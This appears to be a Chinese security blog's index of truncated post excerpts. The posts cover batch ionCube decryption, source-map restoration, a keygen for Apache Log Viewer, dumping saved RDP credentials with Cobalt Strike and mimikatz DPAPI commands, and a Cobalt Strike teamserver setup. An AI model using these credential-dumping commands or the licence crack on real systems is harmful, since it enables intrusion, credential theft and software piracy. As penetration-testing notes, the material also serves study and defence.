PHP ioncube V10.X解密
背景项目中碰到个用ionCube V10加密的源码,需要解密做审计,记录下踩的坑
文件数量2000多,找了一番网站发现https://easytoyou.eu/可以提供解密服务,
BTW,这个站一次只能上传一个文件,手动点2000多次不说累死也得烦死
过程按照惯例,先注册个号看看有什么功能
好嘛 10欧元30天会员,冲了再看看解密面板
面板变了,上传个加密的文件抓个包看看
解密完成后在页面中回显下载链接,那么就可以写脚本批量跑了。
思路脚本需要实现的功能是遍历所有指定格式的文件,保存获取到的列表,上传解密,下载解密后的文件
直接贴代码
遍历符合格式的文件代码# Load Foldersdef get_all_path(self): if os.path.exists(self.FileList): pass else: postfix = set(['php']) # 设置要记录的文件格式 for maindir, subdir, file_name_list in os.walk(self.dstF ...
域渗透实战
d85b19524ca0a6165d6a5d104b6e7f3540bbe833f7a46aa2c8385f2352a6b78191a33438805dbe118a73272245003888f1c78cbbde20bd8af3c881f883531bc2e0b8b49dbecae215cc2e7e2be5558c3e3429ded056ad1e93de5dd6edb59334dbcd1227be977e5577486286164f1ed34154fe58aa2094c02e2382c7449b1e2e33f05adf63418715a2e50267854edd247d5a9bf572bfdf0ba349d6be8e86180c244fe9b129d4bbd924ad07cad55d3f24e611e259a4a3a086fda56a8b038c170211ab662d634f65192568f9b208562df62c4a0234cfa3a971162996e7276ff8ae88c363bbb56e9b66484bae1ab72ab05832bfb313c052bd5b86b ...
还原JS Map文件
做项目时发现一个站点为前后分离的架构,翻了下发现了map文件,采用restore-source-tree还原时报错,记录下解决过程
安装先从git克隆到本地
git clone https://github.com/laysent/restore-source-tree.git
然后进入文件夹
npm install
这里建议挂个代理、VPN,国内很慢
这里在win下会报错
λ npm cinstall npm WARN deprecated [email protected]: � Thanks for using Babel: we recommend using babel-preset-env now: please read https://bab ...
Apache Log Viewer 5.X 注册机
抽空研究了下ALV的注册机制,写了个注册机
分析ALV的注册方法是unlockCodeToolStripMenuItem_Click方法,当点击Unlock按钮时会触发注册事件并调用Class2类中的smethod_1、smethod_02个方法进行校验,详细流程见如下代码
unlockCodeToolStripMenuItem_Click方法
private void unlockCodeToolStripMenuItem_Click(object sender, EventArgs e) { string text = this.prefs_0.Key; if (!InputForm.smethod_3("Apache Logs Viewer | " + Class96.smethod_264(), Class96.smethod_143(), ref text)) { return; } if (text != null) { text = text.Trim(); } if (st ...
获取远程主机保存的RDP凭据密码
拿下一台运维机,上了个CS,发现曾经连接过几台服务器并且保存了凭据,网上查了圈发现CS不支持交互式mimikatz,记录下获取远程主机RDP凭据。
Windows保存RDP凭据的目录是C:\Users\用户名\AppData\Local\Microsoft\Credentials
可通过命令行获取,执行: cmdkey /list或powerpick Get-ChildItem C:\Users\rasta_mouse\AppData\Local\Microsoft\Credentials\ -Force注意:cmdkey /list命令务必在Session会话下执行,system下执行无结果。
使用cobalt strike中的mimikatz可以获取一部分接下来要用到的masterkey和pbData
mimikatz dpapi::cred /in:C:\Users\USERNAME\AppData\Local\Microsoft\Credentials\SESSIONID
输出应类似
**BLOB** dwVersion : 00000001 - 1 ...
Cobalt Strike Teamserer的搭建
记录下Cobalt Strike Teamserer的搭建
环境如下
Ubuntu 18.04
Cobalt Strike 3.14
准备一台Ubuntu 18.04的服务器,下载Cobalt Strike完整文件并传到服务器上
安装JDK1.8
apt install openjdk-8-jdk -y
装好后尝试执行./teamserver 10.16.11.55 cSro0t进行验证
启动成功
添加服务vi /etc/systemd/system/cobaltstrike.service
[Unit]Description=CS ServiceAfter=network.targetWants=network.target[Service]Type=simplePIDFile=/run/CS.pidWorkingDirectory=/path_to_cobaltstrike_root_directory/ExecStart=/path_to_cobaltstrike_root_directory/teamserver YOUR_SERVER_IP YOUR_PAS ...